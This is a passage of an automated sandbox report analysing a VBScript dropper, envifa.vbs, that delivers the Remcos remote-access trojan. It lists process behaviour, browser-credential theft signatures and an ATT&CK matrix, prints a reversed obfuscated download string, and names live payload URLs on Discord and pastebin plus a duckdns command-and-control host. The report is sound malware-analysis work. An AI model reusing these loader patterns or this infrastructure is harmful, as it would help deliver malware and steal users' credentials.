('&680d18e4f3bf6456c136a90d310d8712a85c58a3995f1ad6b9c915670d6dab1a=mh&f818d866=si&f03de866=xe?txt.7.9ivne/8345426616481030621/1624179062327335121/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $mhsfo , '_____dgf_______________________________________-------', $lprkl, '1', 'roda' ));"Jump to behavior
                Source: RegSvcs.exe, 00000004.00000002.3014847261.0000000001206000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: RegSvcs.exe, 00000004.00000002.3014847261.00000000011A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerpc]
                Source: RegSvcs.exe, 00000004.00000002.3014847261.0000000001206000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                Source: RegSvcs.exe, 00000004.00000002.3014847261.0000000001206000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerL6\
                Source: RegSvcs.exe, 00000004.00000002.3014847261.0000000001206000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerL6\.a
                Source: RegSvcs.exe, 00000004.00000002.3014847261.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3014847261.00000000011A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                Source: RegSvcs.exe, 00000004.00000002.3014847261.0000000001206000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerL6\fa
                Source: RegSvcs.exe, 00000004.00000002.3014847261.0000000001206000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerL6\24pa
                Source: RegSvcs.exe, 00000004.00000002.3014847261.0000000001206000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerL6\143a
                Source: RegSvcs.exe, 00000004.00000002.3014847261.0000000001206000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerL6\ngsoa
                Source: RegSvcs.exe, 00000004.00000002.3014847261.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, logs.dat.4.drBinary or memory string: [Program Manager]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00434C52 cpuid 4_2_00434C52
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoA,4_2_0040F8D1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: EnumSystemLocalesW,4_2_00452036
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_004520C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoW,4_2_00452313
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: EnumSystemLocalesW,4_2_00448404
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_0045243C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoW,4_2_00452543
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_00452610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoW,4_2_004488ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_00451CD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: EnumSystemLocalesW,4_2_00451F50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: EnumSystemLocalesW,4_2_00451F9B
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00404F51 GetLocalTime,CreateEventA,CreateThread,4_2_00404F51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041B60D GetComputerNameExW,GetUserNameW,4_2_0041B60D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004493AD _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,4_2_004493AD
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.powershell.exe.21a1eaef6e0.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.powershell.exe.21a1eaef6e0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.3015953762.0000000002E0F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3014847261.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1839358905.0000021A1EAEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4908, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6736, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data4_2_0040BA12
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\4_2_0040BB30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: \key3.db4_2_0040BB30

                Remote Access Functionality

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-LD53L6Jump to behavior
                Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.powershell.exe.21a1eaef6e0.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.powershell.exe.21a1eaef6e0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.3015953762.0000000002E0F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3014847261.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1839358905.0000021A1EAEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4908, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6736, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: cmd.exe4_2_0040569A
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information221
                Scripting
                Valid Accounts11
                Native API
                221
                Scripting
                1
                DLL Side-Loading
                1
                Deobfuscate/Decode Files or Information
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Exploitation for Client Execution
                1
                DLL Side-Loading
                1
                Bypass User Account Control
                4
                Obfuscated Files or Information
                211
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol211
                Input Capture
                12
                Ingress Tool Transfer
                Exfiltration Over Bluetooth1
                Defacement
                Email AddressesDNS ServerDomain Accounts12
                Command and Scripting Interpreter
                1
                Windows Service
                1
                Access Token Manipulation
                1
                Software Packing
                2
                Credentials In Files
                1
                System Service Discovery
                SMB/Windows Admin Shares3
                Clipboard Data
                21
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                Service Execution
                Login Hook1
                Windows Service
                1
                DLL Side-Loading
                NTDS3
                File and Directory Discovery
                Distributed Component Object ModelInput Capture1
                Non-Standard Port
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts2
                PowerShell
                Network Logon Script222
                Process Injection
                1
                Bypass User Account Control
                LSA Secrets33
                System Information Discovery
                SSHKeylogging1
                Remote Access Software
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Masquerading
                Cached Domain Credentials131
                Security Software Discovery
                VNCGUI Input Capture2
                Non-Application Layer Protocol
                Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                Virtualization/Sandbox Evasion
                DCSync31
                Virtualization/Sandbox Evasion
                Windows Remote ManagementWeb Portal Capture23
                Application Layer Protocol
                Exfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Access Token Manipulation
                Proc Filesystem3
                Process Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt222
                Process Injection
                /etc/passwd and /etc/shadow1
                Application Window Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Owner/User Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1470985 Sample: envifa.vbs Startdate: 10/07/2024 Architecture: WINDOWS Score: 100 28 remcoss2024feb.duckdns.org 2->28 30 pastebin.com 2->30 32 2 other IPs or domains 2->32 46 Snort IDS alert for network traffic 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 56 13 other signatures 2->56 9 wscript.exe 1 2->9         started        signatures3 52 Uses dynamic DNS services 28->52 54 Connects to a pastebin service (likely for C&C) 30->54 process4 signatures5 66 VBScript performs obfuscated calls to suspicious functions 9->66 68 Suspicious powershell command line found 9->68 70 Wscript starts Powershell (via cmd or directly) 9->70 72 3 other signatures 9->72 12 powershell.exe 7 9->12         started        process6 signatures7 74 Suspicious powershell command line found 12->74 76 Found suspicious powershell code related to unpacking or dynamic code loading 12->76 78 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 12->78 15 powershell.exe 14 15 12->15         started        19 conhost.exe 12->19         started        process8 dnsIp9 38 pastebin.com 104.20.4.235, 443, 49730, 49731 CLOUDFLARENETUS United States 15->38 40 cdn.discordapp.com 162.159.129.233, 443, 49735 CLOUDFLARENETUS United States 15->40 42 Writes to foreign memory regions 15->42 44 Injects a PE file into a foreign processes 15->44 21 RegSvcs.exe 3 15 15->21         started        signatures10 process11 dnsIp12 34 remcoss2024feb.duckdns.org 191.98.25.251, 4576, 49736 EPMTelecomunicacionesSAESPCO Colombia 21->34 36 geoplugin.net 178.237.33.50, 49737, 80 ATOM86-ASATOM86NL Netherlands 21->36 26 C:\ProgramData\remcos\logs.dat, data 21->26 dropped 58 Contains functionality to bypass UAC (CMSTPLUA) 21->58 60 Detected Remcos RAT 21->60 62 Contains functionalty to change the wallpaper 21->62 64 5 other signatures 21->64 file13 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://geoplugin.net/json.gp0%URL Reputationsafe
                http://geoplugin.net/json.gp/C0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                https://cdn.discordapp.com/attachments/1215337232609714261/1260301846166245438/envi9.7.txt?ex=668ed30f&is=668d818f&hm=a1bad6d076519c9b6da1f5993a85c58a2178d013d09a631c6546fb3f4e81d086&0%Avira URL Cloudsafe
                https://firebasestorage.googleh90%Avira URL Cloudsafe
                https://pastebin.com/raw/sFgsbG3v0%Avira URL Cloudsafe
                https://pastebin.com/raw0%Avira URL Cloudsafe
                https://cdn.discordapp.com/attachments/1215337232609714261/1260301846166245438/envi9.7.txt?ex=668ed30%Avira URL Cloudsafe
                https://github.com/Pester/Pester0%Avira URL Cloudsafe
                https://cdn.discordapp.com0%Avira URL Cloudsafe
                http://geoplugin.net/json.gp=0%Avira URL Cloudsafe
                https://cdn.discorP0%Avira URL Cloudsafe
                http://geoplugin.net/json.gpA0%Avira URL Cloudsafe
                http://cdn.discordapp.com0%Avira URL Cloudsafe
                https://firebasestorage.googlehrA0%Avira URL Cloudsafe
                http://pastebin.com/raw/v9y5q5vv0%Avira URL Cloudsafe
                http://pastebin.com0%Avira URL Cloudsafe
                https://pastebin.com0%Avira URL Cloudsafe
                https://oneget.orgX0%Avira URL Cloudsafe
                http://geoplugin.net/json.gpDt80%Avira URL Cloudsafe
                remcoss2024feb.duckdns.org100%Avira URL Cloudphishing
                https://pastebin.com/raw/V9y5Q5vv0%Avira URL Cloudsafe
                https://oneget.org0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                geoplugin.net
                178.237.33.50
                truefalse
                  unknown
                  cdn.discordapp.com
                  162.159.129.233
                  truetrue
                    unknown
                    remcoss2024feb.duckdns.org
                    191.98.25.251
                    truetrue
                      unknown
                      pastebin.com
                      104.20.4.235
                      truetrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://cdn.discordapp.com/attachments/1215337232609714261/1260301846166245438/envi9.7.txt?ex=668ed30f&is=668d818f&hm=a1bad6d076519c9b6da1f5993a85c58a2178d013d09a631c6546fb3f4e81d086&true
                        • Avira URL Cloud: safe
                        unknown
                        https://pastebin.com/raw/sFgsbG3vfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://geoplugin.net/json.gpfalse
                        • URL Reputation: safe
                        unknown
                        http://pastebin.com/raw/V9y5Q5vvtrue
                          unknown
                          remcoss2024feb.duckdns.orgtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://pastebin.com/raw/V9y5Q5vvfalse
                          • Avira URL Cloud: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1839358905.0000021A1E910000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1823955766.0000021A101C5000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000003.00000002.1823955766.0000021A0FFED000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1823955766.0000021A1013F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1823955766.0000021A1013F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://go.micropowershell.exe, 00000003.00000002.1823955766.0000021A0FAEC000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://firebasestorage.googleh9powershell.exe, 00000003.00000002.1823955766.0000021A0FF52000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://pastebin.com/rawpowershell.exe, 00000003.00000002.1823955766.0000021A0EFDB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://contoso.com/Licensepowershell.exe, 00000003.00000002.1823955766.0000021A101C5000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://contoso.com/Iconpowershell.exe, 00000003.00000002.1823955766.0000021A101C5000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://cdn.discordapp.compowershell.exe, 00000003.00000002.1823955766.0000021A0ECE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1823955766.0000021A0F066000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1823955766.0000021A1013F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://cdn.discorPpowershell.exe, 00000003.00000002.1823955766.0000021A0F066000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://geoplugin.net/json.gp=RegSvcs.exe, 00000004.00000002.3014847261.00000000011E9000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://cdn.discordapp.com/attachments/1215337232609714261/1260301846166245438/envi9.7.txt?ex=668ed3powershell.exe, 00000003.00000002.1823955766.0000021A0F066000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://geoplugin.net/json.gpARegSvcs.exe, 00000004.00000002.3014847261.00000000011E9000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://geoplugin.net/json.gp/Cpowershell.exe, 00000003.00000002.1839358905.0000021A1EAEF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://firebasestorage.googlehrApowershell.exe, 00000003.00000002.1823955766.0000021A0F031000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://cdn.discordapp.compowershell.exe, 00000003.00000002.1823955766.0000021A0F066000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://contoso.com/powershell.exe, 00000003.00000002.1823955766.0000021A101C5000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1839358905.0000021A1E910000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1823955766.0000021A101C5000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://pastebin.com/raw/v9y5q5vvpowershell.exe, 00000003.00000002.1847918103.0000021A26A50000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://oneget.orgXpowershell.exe, 00000003.00000002.1823955766.0000021A0FFED000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          HTTPS://CDN.DISCORDAPP.COM/ATTACHMENTS/1215337232609714261/1260301846166245438/ENVI9.7.TXT?EX=668ED3powershell.exe, 00000003.00000002.1823955766.0000021A0ECE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1823955766.0000021A0F066000.00000004.00000800.00020000.00000000.sdmpfalse
                            unknown
                            https://aka.ms/pscore68powershell.exe, 00000001.00000002.1856499835.000001A1A48BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1856499835.000001A1A48D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1823955766.0000021A0E8A1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1856499835.000001A1A4904000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1823955766.0000021A0E8A1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://geoplugin.net/json.gpDt8RegSvcs.exe, 00000004.00000002.3014847261.0000000001206000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://pastebin.compowershell.exe, 00000003.00000002.1823955766.0000021A0FF04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1823955766.0000021A0EFEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1823955766.0000021A0FEEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1823955766.0000021A0FC1E000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            https://pastebin.compowershell.exe, 00000003.00000002.1823955766.0000021A0EC57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1823955766.0000021A0FEEA000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://oneget.orgpowershell.exe, 00000003.00000002.1823955766.0000021A0FFED000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            104.20.4.235
                            pastebin.comUnited States
                            13335CLOUDFLARENETUStrue
                            162.159.129.233
                            cdn.discordapp.comUnited States
                            13335CLOUDFLARENETUStrue
                            191.98.25.251
                            remcoss2024feb.duckdns.orgColombia
                            13489EPMTelecomunicacionesSAESPCOtrue
                            178.237.33.50
                            geoplugin.netNetherlands
                            8455ATOM86-ASATOM86NLfalse
                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1470985
                            Start date and time:2024-07-10 19:52:10 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 6m 47s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:9
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:envifa.vbs
                            Detection:MAL
                            Classification:mal100.rans.troj.spyw.expl.evad.winVBS@8/7@6/4
                            EGA Information:
                            • Successful, ratio: 66.7%
                            HCA Information:
                            • Successful, ratio: 94%
                            • Number of executed functions: 53
                            • Number of non-executed functions: 190
                            Cookbook Comments:
                            • Found application associated with file extension: .vbs
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                            • Excluded IPs from analysis (whitelisted): 142.250.185.138, 172.217.18.10, 142.250.74.202, 142.250.184.202, 142.250.181.234, 142.250.185.170, 216.58.206.74, 142.250.185.202, 142.250.186.138, 142.250.185.74, 142.250.186.106, 142.250.186.42, 142.250.186.170, 142.250.185.106, 172.217.16.202, 142.250.185.234
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, firebasestorage.googleapis.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target powershell.exe, PID 6740 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: envifa.vbs
                            TimeTypeDescription
                            13:53:07API Interceptor43x Sleep call for process: powershell.exe modified
                            13:53:47API Interceptor2489808x Sleep call for process: RegSvcs.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            104.20.4.235New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                            • pastebin.com/raw/NsQ5qTHr
                            Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                            • pastebin.com/raw/NsQ5qTHr
                            Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                            • pastebin.com/raw/NsQ5qTHr
                            Pending_Invoice_Bank_Details_kofce_.JS.jsGet hashmaliciousWSHRATBrowse
                            • pastebin.com/raw/NsQ5qTHr
                            Update on Payment.jsGet hashmaliciousWSHRATBrowse
                            • pastebin.com/raw/NsQ5qTHr
